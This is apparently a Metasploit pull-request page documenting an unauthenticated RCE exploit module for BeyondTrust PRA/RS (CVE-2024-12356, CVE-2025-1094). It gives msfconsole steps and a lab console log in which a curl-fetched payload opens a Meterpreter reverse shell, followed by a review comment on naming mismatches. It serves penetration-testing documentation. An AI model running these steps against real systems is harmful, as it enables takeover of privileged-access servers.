Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094) #19877

Merged
merged 19 commits into from
Feb 17, 2025
@@ -0,0 +1,101 @@
## Vulnerable Application
This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
product site. This exploit targets PRA and RS versions `24.3.1` and below.

## Testing
This exploit was tested against a vulnerable BeyondTrust Remote Support target running version `24.1.2`. To install
a virtual appliance, follow [this documentation](https://docs.beyondtrust.com/rs/docs/va-install). You will first need
to acquire the relevant software packages.

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/http/beyondtrust_pra_rs_unauth_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
6. `set LPORT 4444`
7. `check`
8. `exploit`

## Options

### TargetCompanyName
If set, use this name value to identify the company name of the deployed site (e.g. `mytestcompany`).
By default, this is auto discovered.

### TargetServerFQDN
If set, use this FQDN value to identify the FQDN of the deployed site (e.g. `support.mytestcompany.com`).
By default, this is auto discovered.

### LeverageCVE_2024_12356
By default, this exploit does not leverage the argument injection vulnerability CVE-2024-12356, and instead exploits the
SQLi vulnerability CVE-2025-1094 directly. Enabling this option will cause this exploit to leverage CVE-2024-12356 during
the exploitation of the SQLi vulnerability CVE-2025-1094. In either case the SQLi vulnerability CVE-2025-1094 is leveraged
to achieve RCE.

## Scenarios

### Default

```
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > show options
Module options (exploit/linux/http/beyondtrust_pra_rs_unauth_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.105 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILENAME usKuEPuSzgnx no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Default
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[*] Sending stage (3045380 bytes) to 192.168.86.105
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000
meterpreter > getuid
Server username: mytestcompany
meterpreter > sysinfo
Computer : 192.168.86.105
OS : Gentoo 2.14 (Linux 6.1.76-bt)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
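Review bot: the payload name in Verification Step 4 (`cmd/linux/http/x64/meterpreter_reverse_tcp`) does not match the one shown in the Default scenario's `show options` output (`cmd/linux/http/x64/meterpreter/reverse_tcp`); pick the correct name and use it in both places so the steps can be followed verbatim. The same applies to `set RHOST` in step 3 versus `RHOSTS` in the options table. Also, the three module-specific options documented under Options (`TargetCompanyName`, `TargetServerFQDN`, `LeverageCVE_2024_12356`) do not appear in the `show options` listing in the scenario; if they are advanced options, say so and mention how to view them so readers know where to set them.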